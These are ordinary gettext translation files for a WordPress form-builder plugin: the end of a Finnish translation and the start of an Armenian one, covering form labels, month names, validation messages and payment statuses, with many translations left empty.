#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Vahvistuslinkin on virheellinen."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "kenttä vaaditaan."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Tämä ei ole kelvollinen sähköpostiosoite."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"Et voi valita entisiä päivämääriä. Valitse päivämäärä alkaen nykyinen."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "The"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "arvon on oltava välillä "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "määrä "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Sinun pisteet pitäisi olla alle "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Otsikko"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "ensimmäinen"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Viime"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Keskimmäinen"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Suuntanumero"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Puhelinnumero"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "dollaria "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "senttiä "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "alkaen "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "Jos haluat"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "Siirry "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "Nollaa "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Valitse Kenttä "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Valitse Päivämäärä"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-hy_AM.po000060400000060160152434416630012176 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 16:58+0400\n"
"PO-Revision-Date: 2015-05-22 16:58+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: hy\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Փողոց"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Փողոց Line 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Քաղաք"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Նահանգ / Մարզ / Տարածաշրջան"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Փոստային / Zip Code"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Երկիր"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Հունվար"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Փետրվար"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Մարտ"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "Ապրիլ"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Մայիսի"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Հունիս"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Հուլիս"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "Օգոստոս"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "Սեպտեմբեր"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Հոկտեմբեր"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "Նոյեմբեր"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Դեկտեմբեր"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Error, սխալ անվտանգության կոդը:"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "Ձեր IP-ն սեւ ցուցակում. Խնդրում ենք կապնվել կայքի կառավարչին. "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Ֆայլը գերազանցում է թույլատրելի չափը:"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Ներեցեք, Ձեզ չի թույլատրվում բեռնել այս տեսակը ֆայլը."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Error, ֆայլի չի կարող տեղափոխվել:"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr "Այս դաշտը %s պահանջում է եզակի մուտքի արժեքը, եւ դա արդեն ներկայացվել."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Error, էլ չի ուղարկվել:"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Ոչինչ չի ներկայացվել."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Ձեր ձեւ հաջողությամբ ներկայացվել."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Error, էլ չի ուղարկվել:"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Ձեր էլփոստի հասցեն արդեն ստուգված."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Ձեր էլփոստի հաջողությամբ ստուգված."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Ձեր էլփոստի ստուգման ժամանակը սպառվել է."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Ստուգման հղում է անվավեր:"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "Դաշտը պարտադիր է:"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Սա ոչ թե վավեր էլ."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"Դուք կարող եք ընտրել նախկին ժամկետները. Ընտրեք ամսաթիվը սկսած ընթացիկ մեկը."

